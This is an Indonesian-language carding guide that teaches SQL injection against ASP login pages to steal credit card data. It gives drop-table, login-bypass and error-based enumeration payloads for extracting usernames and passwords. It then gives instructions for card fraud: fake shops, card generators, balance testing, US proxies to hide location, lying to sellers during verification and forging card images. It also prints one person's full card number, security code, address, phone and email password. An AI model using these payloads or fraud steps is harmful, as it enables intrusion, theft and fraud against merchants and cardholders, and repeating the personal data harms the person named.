[apapun yang menjadi resiko ditanggung pembaca penulis hanya sekedar share] 1. carding
Carding Atau penipuan dengan kartu kredit adalah kejahatan, dan tidak disarankan
dinegara manapun
Bagaimana Memulai Carding ?
- Temukan dan cari data kartu kredit, bagaimana ?
Satu dari banyak cara yntuk mencari data kartu kredit adalah SQL Injection,
Bagaimana ?
Sql injection di ASP :
Ini adalah teknik SQL :
Temukan halaman admin di mesin perncari, seperti google
Misalnya www.sebuah-toko.com/admin.asp
Ketikan salah satu keywordnya : “ .com/admin.asp “
“ .com/admin/login.asp “
Atau banyak keyword lainnya
A. Memerintahkan sistem untuk menghapus tabel user dalam database.
Ketika tabel user tersebut terhapus, maka muncullah kesempatan bagi siapapun untuk
memasuki database tanpa sistem pengaman. Strategi ini biasanya dijalankan dengan
mengisi bidang Username dengan perintah:
'; drop table users--
Created by Carding AngeCreated Angel www.malaikat.info
B. Memerintahkan sistem untuk membiarkan siapapun memasuki database.
Untuk menjalankan strategi ini, seorang carder berlagak mengetahui user yang
diperbolehkan memasuki sistem. Di bagian Username, si carder memasukan perintah:
admin'--
C. Berlagak menjadi pengguna yang berada diurutan pertama dalam tabel user
di database.
Didalam kolom username gunakan perintah ini :
' or 1=1--
D. Membuat user fiktif.
Di kolom username berikan peritah ini :
' union select 1, 'fictional_user', 'some_password', 1--
Dengan perintah itu, sistem dibikin percaya bahwa baris yang konstan di atas
merupakan bagian perintah yang terdapat dalam database itu sendiri.
E. Mengenali struktur database dari pesan error
Seorang carder yang sedang mencoba menembus sebuah situs web yang
menggunakan pemrograman ASP, misalnya, dengan sengaja mengisi bidang
Username dengan sebuah perintah yang salah:
' having 1=1--
Perintah ini akan memicu pesan error dari sistem yang berbunyi, misalnya:
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'users.id' is invalid in the select list because it is
not contained in an aggregate function and there is no
GROUP BY clause.
/process_login.asp, line 35
Didalam pesan kesalahan diatas ada table bernama users dan kolom bernama id
Sekarang hacker menggunakan kolom username dengan perintah seperti ini :
' group by users.id having 1=1--
Perintah tersebut, misalnya, akan memunculkan pesan error:
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'users.username' is invalid in the select list because it
is not contained in either an aggregate function or the
GROUP BY clause.
/process_login.asp, line 35
Pesan error itu memberikan informasi tambahan bahwa dalam tabel users terdapat
kolom username. Bertambahlah amunisi si carder untuk mengintip struktur
database. Ia bisa saja menyusulkan serangannya. Ia kembali mengisi bidang
Username dengan perintah:
Selanjutnya berikan perintah ini lagi :
' group by users.id, users.username, users.password,
users.privs having 1=1--
Perintah itu sama dengan query sebagai berikut:
select * from users where username = ''
Perintah di atas mungkin tidak menimbulkan error. Jika itu terjadi maka carder
menjadi teryakinkan bahwa tabel users terdapat kolom password.
Carder yang mencoba mencari tahu tipe kolom username di database itu akan mengisi
lagi bidang Username dengan perintah:
' union select sum(username) from users--
Perintah sum sengaja dipakai oleh carder dengan asumsi bahwa tipe kolom username
adalah integer (berupa karakter angka yang bisa dijumlahkan). Tapi mungkin saja
hasil dari perintah itu adalah sebuah pesan error yang menyelipkan informasi bahwa
kolom username bertipe varchar ( bukan angka dan tidak bisa dijumlahkan) seperti
ini:
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or
average aggregate operation cannot take a varchar data
type as an argument.
/process_login.asp, line 35
Ia bisa menggunakan cara yang sama untuk mengetahui tipe kolom lain yang ada di
database.
Sedangkan untuk mengetahui harga tabel dalam database, si carder bisa saja mengisi
lagi bidang Username dengan perintah:
' union select
Akibat dari perintah itu, muncullah pesan error seperti di bawah ini:
@@version,1,1,1--
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'Microsoft SQL Server
2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright
© 1988-2000 Microsoft Corporation Enterprise Edition on
Windows NT 5.0 (Build 2195: Service Pack 2) ' to a column
of data type int.
/process_login.asp, line 35
Berkat informasi dari pesan error itu, carder akan berusaha untuk mengkonversikan
konstanta @@version ke dalam bentuk interger karena kolom pertama pada tabel
user bertipe interger. Ia dapat membaca username pada tabel user dengan cara
mengisi bidang Username dengan perintah:
' union select min(username),1,1,1 from users where
username > 'a'--
Perintah di atas akan mengecilkan daerah pencarian karena username yang
dibutuhkan lebih besar dari a dan mengkonversikannya ke dalam interger. Hasilnya
adalah pesan error sebagi berikut:
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'admin' to a column of
data type int.
/process_login.asp, line 35
Apa yang di dapat oleh si carder? Ia jadi tahu bahwa di dalam database itu ada
account admin! Penggalian data lebih dalam bisa dilakukan oleh si carder dengan
mengisi bidang Username dengan perintah:
' union select min(username),1,1,1 from users where
username > 'admin'--
Hasilnya, sebuah pesan error yang berbunyi, misal:
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'areyoudog' to a
column
of data type int.
/process_login.asp, line 35
Ya! Sekarang si carder mendapatkan sebuah username: areyoudog. Langkah
selanjutnya yang diambil carder adalah mencari tahu password untuk pengguna
dengan username chris tadi, dengan cara mengisi bidang Username dengan perintah:
' union select password,1,1,1 from users where username =
'admin'--
Pesan error yang didapat akan berbunyi, misal:
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'maya2000' to a
column of data type int.
/process_login.asp, line 35
Dapat! Dalam ilustrasi di atas, si carder sekarang punya username “roger” beserta
passwordnya, “maya2000”. Kalau sudah begini, seorang carder sudah benar-benar
bisa memasuki database dan menguras isinya, termasuk data kartu kredit pelanggan
yang ada di situ.
CARA INI HANYA SALAH SATU SAJA, BANYAK CARA LAINNYA
SEPERTI DENGAN SCAMPAGE, YAITU PENGGUNAAN HALAMA WEB
PALSU UNTUK MENGELABUI KORBAN SEHINGGA MEMASUKAN
DATA CCNYA.ATAU TEKNIK MEMBOBOL LAINNYA
INI JUGA CONTOH PERINTAH INJECT SQL LAINNYA :
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
CARA CARI CC LAINNYA LAGI ADALAH DENGAN WEB TRAP, YAITU
KITA MENGELOLA WEBSITE PURA2 JUALAN GITU. NTAR BANYAK
YANG DATANG. BELI. DATA CCNYA KITA AMBIL
PENGEN PUNYA WEB TRAP? HUBUNGI WWW.MALAIKAT.COM
ADA LAGI CARA LAIINYA, YAITU DENGAN MELAKUKAN GENERATE,
ADA SOFTWARE YANG ANDA DOWNLOAD UNTUK MENGEGERATE
CC, DOWNLOAD AJA WWW.MALAIKAT.INFO
Berikut contoh kartu kreditnya : dan bisa digunakan untuk berbelanja apa saja di
internet :
Email owner : janer90068@yahoo.com
Password: winnie
First name: Jane
Last name: Reardon
Address: 5860 Canyon Cove
City: Los Angeles
State : CA
Zip: 90068
Country: United States
Phone: 323 871.1108
Card type: Mastercard
Card number: 5466160175574084
Card expired: 04 / 2008
Card security: 677
CEK DULU VALIDITAS CCNYA DI WWW.WALLET.YAHOO.COM
INI CONTOH CC YANG TIDAK VALID. INGAT BILA CC YANG
BERMASALAH ADALAH KETIKA DISUBMIT YAHOO WEALLET
MENOLAK DENGAN BLOK WARNA KUNING : Created Angel www.malaikat.info NAMUN BILA INGIN MENGETAHUI JUMLAH UANG DI CC, YANG PALING
AGAK MUNGKIN ADALAH PAKE SITUS YANG MEMILIKI MERCHANT
WWW.2CHECKOUT.COM DENGAN MEMASAKUN DATA CCNYA AJA.
DATA LAINNYA DI SALAHKAN. ORDERLAH MISALNYA 2000$ BILA
TULISANNYA ISSUFECIENT ENOUGH MONEY ATAU TULISAN YANG
MENGARAH SEPERTI ITU BERARTI UANGNYA GAK CUKUP, NAMUN
BILA TULISANNYA DID NOT MACTH BERARTI TUH CC NGANGKAT
ALIAS ADA UANGNYA AMPE 2000$.. UNTUK CHECK DISITUS INI. CHECK
DULU DI YAHOO WALLET
Untuk informasi detail mengenai bank info bisa didapatkan lewat software cc2bank
yang didownload di www.malaikat.info
Dan apabila anda kesulitan mendapatkan data kartu kredit,
anda bisa mmembelinya di www.malaikat.info
DENGAN DATA KARTU KREDIT DIATAS ANDA BISA BERBELANJA APA
SAJA , DIMANA SAJA DI INTERNET.
NAMUN YANG HARUS ANDA CERMATI ADALAH NEGARA DATA CREDIT
CARD TADI. SEPERTI PADA CONTOH DIATAS NEGARANYA ADALAH
USA. MAKA BAGI ANDA YANG BUKAN DARI NEGARA USA, SANGAT
TIDAK MUNGKIN UNTUK BISA BERBELANJA BEGITU SAJA. ANDA
HARUS MENGGANTI PENGALAMATAN KOMPUTER ANDA SUPAYA ANDA
SEAKAAN-AKAN ADA DI USA. ARTINYA MENGUATKAN ALIBI BAHWA
ANDA SEAKAN-AKAN SEPERTI SEDANG ADA DI USA.
CARANYA :
GANTI PROXY / IP ADRRESS ANDA DENGAN PROXY USA. PROXY YANG PERAWAAN DAN FRESH ADALAH BIASANYA YANG
MEMAKAI PORT : 80
PORT : 5 ANGKA MISALNYA : 54723 TAU PORT LIMA ANGKA LAINNYA
ATAU : 7212
DAN JUGA SOCK !! DAN LAKUKAN TES DI WWW.SHOWMYIP.COM
ATAU WWW.STAYINVISIBLE.COM
Atau www.samair.ru DIMANA SEH UNTUK
MENDAPATKAN PROXY ?
BUKA WWW.GOOGLE.COM : ketikan “free proxy list”
Atau buka www.stayinvisible.com
Ada banyak link menuju alamat – alamat situs proxy
Atau buka www.samair.ru
Atau buka www.nntime.com SETELAH PROXY KITA DIGANTI
APA YANG BISA KITA LAKUKAN ?
SETELAH PROXY DAN CREDIT CARD INFO ( CC ) SIAP, CUMA SIMPEL
TINGGAL NGORDER AJA BRO!
NAMUN ADA HAL YANG MENDASAR :
ADA PERBEDAAN ANTARA CARA MENGORDER BARANG YANG
PENGIRIMANNYA BERUPA FISIK DENGAN YANG DOWNLOAD ATAU
BERUPA SERVICE.
KALO YANG PENGIRIMANNYA DENGAN CARA INSTAN SEPERTI
DOWNLOAD ATAU BERUPA SERVICE ATAU BERUPA ACCOUNT2
TERTENTU, MISALNYA :
BOKEP ( ACCOUNT FILEM PORNO),
SOFTWARE2 YANG BISA DIDOWNLOAD
EBOOK
GAMES
SMS SERVICE
DAN LAIN2
ITU RELATIF LEBIH MUDAH. KARENA SEKALI ORDER BIASANYA
SETEALAH CC DITERIMA ATAU APPROVED. KITA SUDAH
MENDAPATKAN AKSES TERHADAP YANG KITA BELI
YANG PERLU DIPERHATIKAN KETIKA AKAN MEMBELI PRODUCT
ATAU SESUATU, UNTUK MENGHINDARI SITUS FAKE ATAU PENIPUAN
ADALAH :
1. SSL PADA CART SYSTEMNYA ( MISALNYA SS 128 BIT )
TERLIHAT ADA GAMBAR KUNCI KETIKA MEMASUKAN
BARANG KEDALAM CARAT ATAU KETIKA MAU
MEMBAYARNYA
2. NEGARA SITUSNYA DARI MANA DULU, KALO DARI NEGARA
GAK MAJU SEBAIKNYA JANGAN ( MISAL AFRIKA)
3. LIHAT BAGIAN CONTACT US NYA, ADA TELPNYA MISALNYA
DARI NEGARA AMERIKA, MAKA LIHAT KODE TELPNYA BETUL
GAK DARI AMERIKA
4. UNTUK TOKO YANG BESAR BIASANYA MENCANTUMKAN TELP
BEBAS PULSA ATAU BAHKAN MEREKA BERSEDIA UNTUK TELP.
DAN TOKO2 SEPERTI ITU YANG AKAN KITA HAJAR
SELANJUTNYA ANDA PERHATIKAN PULA PADA BAGIAN
PAYMENTNYA. ADA PILIHAN PEMBAYARAN, BIASANYA SEBUAH
SITUS MEMILIKI ATAU MENERIMA SISTEM PEMBAYARAN DENGAN
BERBAGAI METODA PEMBAYARAN.
KALO BISA HINDARI SETIAP PEMBAYARAN DENGAN KARTU KREDIT
DENGAN MELIBATKAN MERCHANT YANG BUKAN MILIK TOKONYA.
MAKSUDNYA :
MISALNYA TOKO A : WWW.TOKO-A.COM MENERIMA PEMBAYARAN
KARTU KREDIT, BILA KETIKA ORDER KITA MENEMUI PILIHAN
PEMBAYARAN DAN MENEMUKAN BAHWA TOKO TERSEBUT
MEMAKAI MERCHANT LAIN MISALNYA PAYPAL
(WWW.PAYPAL.COM) ATAU WORLDPAY (WWW.WORLDPAY.COM)
ATAU LAINNYA, ITU AKAN JADI RELATIF LEBIH SULIT. KARENA
NANTINYA AKAN MELIBATKAN DUA ADMIN SITUS. YAITU ADMIN
PAYPAL/WORLDPAY DAN ADMIN TOKONYA.
JADI KITA HARUS MENGELABUI 2 ADMIN KETIKA VERIFIKASI.
TAPI SANGAT BANYAK SEBUAH TOKO YANG SUDAH MEMILIKI
MERCHANT SENDIRI. JADI KETIKA NGORDER DI TOKO A
(WWW.TOKO-A) MAKA LANGSUNG SAJA TINGGAL MASUKIN CC
DISITU JUGA.
KEMBALI KE AWAL MISALNYA KITA AKAN MEMBELI SEBUAH
SERVICE ATAU SOFTWARE. LANGSUNG SAJA GANTI PROXYNYA,
SIAPAKAN CCNYA. BUKA SITUSNYA MISALNYA SETELAH GANTI
PROXY KETIK AJA WWW.TOKO-SOFTWARE.COM
INGAT !! UNTUK MEMBELI SEMACAM SOFTWARE ATAU SERVICE
YANG PENGIRIMANNYA DENGAN DOWNLOAD ATAU BERUPA CODE
SAJA, MAKA BILLLING DAN SHIPPING ADDRESSNYA HARUS SAMA,
YAITU YANG PUNYA CC SEBAGAI CATATAN SAJA :
ADA BEBERAPA MERCHANT ATAU TOKO TERKADANG
MEMPERSULIT KITA SEBAGAI PEMBELI. MEREKA MEMBUTUHKAN
VERIFIKASI LEBIH MENDALAM KARENA MEREKA TAKUT DITIPU
VERIFIKASI ITU ADALAH BIASANYA :
1. DIA AKAN TELP KE NOMOR KITA (NO.TLP CC ) ( INI SANGAT
MENYULITKAN KITA ), MAKANYA PADA SAAT MEMASUKAN
DATA TELP GANTILAH DENGAN BUSY PHONE ( DATA BUSY
PHONE BISA DIDADAP PADA SOFTWARE CC2BANK DI
WWW.MALAIKAT.INFO ). UNTUK MENGATASINYA KETIKA DIA
TELP DAN TIDAK MENDAPATKAN RESNPOS, KITA LAKUKAN
ALIBI SELANJUTNYA. EMAIL KAN SELLER TADI ISINYA GINI :
SAYA SEDANG DALAM PERJALANAN DAN TIDAK ADA DI RUMAH,
KEBETULAN TIDAK MEMBAWA HANDPHONE. JIKA MASIH BISA
DILAKUKAN TRANSAKSI INI MOHON DILANJUTNYA, (SEMOGA
NEH SELLER LULUH HATINYA ) BILA GAK JUGA BISA
TERPAKSA ANDA HARUS PUNYA TEMEN YANG SENEGARA
DENGAN DATA CC. BIAR SELLERNYA SURUH TELP
KETEMENMU YANG ADALAH PURA2NYA YANG PUNYA CC.
INGAT : NGORDER ADALAH ALIBI !!! DAN KOMUNIKASI DENGAN
SELLERNYA, BAGAIMANA CARANYA BIAR SELLER YAKIN !
2. BIASANYA SELLER MINTA VERIFIKASI VIA FAX ! INI JUGA
AGAK SULIT, SOLUSINYA PAKE ONLINE FAX SERVICE ATAU
MINTA TOLONG TEMEN YANG ADA DILUAR NEGERI YANG
SATU NEGARA AMA YANG PUNYA CC. ATAU BISA JUGA KAMU
BERALASAN YANG SAMA YAITU SEDANG DALAM PERJALANAN
DAN ADA DI NEGERI ORANG
3. VERIFIKASI YANG MUNGKIN TERJADI LAGI ADALAH : SELLER
MINTA COPY BULAK BALIK CREDIT CARD DAN JUGA DRIVE
LICENSE. SOLUSINYA ADALAH, MASUKAN NOMOR CC NYA KE
SOFTWARE CC2BANK, LALU SETELAH NAMA BANKNYA
DIKETAHUI, MISALNYA BANK ONE, SEGERA BUKA YAHOO.COM
KETIK PADA SEARCH : “BANK ONE” CARD IMAGE, LALU SETELAH
KETEMU, DENGAN SKILL PHOTOSHOP ANDA GANTILAH DATA
GAMBAR IMAGE CC TADI SESUAI DATA ASLI CC. BILA KAMU
GAK BISA PHOTOSHOP MEMBELI SAJA PADA KAMI GAMBAR2
TADI HUBUNGI WWW.MALAIKAT.INFO
4. VERIFIKASI YANG MUNGKIN JUGA TERJADI LAINNYA ADALAH
SI SELLER MENUNGGU UANGNYA MENJADI CAIR. INI CUKUP
BERSIKO ( KEMUNGKINANNYA 50 – 50 ) , KARENA BISA AJA
KEBURU KETAHUAN AMA YANG PUNYA CC SEBENARNYA
ATAU MUNGKIN JUGA GAK KETAHUAN.
JADI SEKALI LAGI UNTUK MEMBELI LAYANAN INTERNET, BERUPA
SERVICE, HOSTING,GAME, DLL TERNYATA CARANYA SANGAT
GAMPANG, SIAPKAN CC, PROXY ELITE, SELESAI
TIPS LAINNYA ADALAH. SELALU GUNAKAN PROXY SAAT BALAS
MEMBALAS EMAIL DENGAN SELLERNYA.
TIPS LAINNYA LAGI ADALAH LIBATKAN BANYAK NEGARA,
MAKSUDNYA : BILA CC NYA US MAKA CARILAH YANG AKAN DIBELI
DARI NEGARA NON US, MISALNYA AUSTRALIA ATAU EROPA Created Angel www.malaikat.info
|
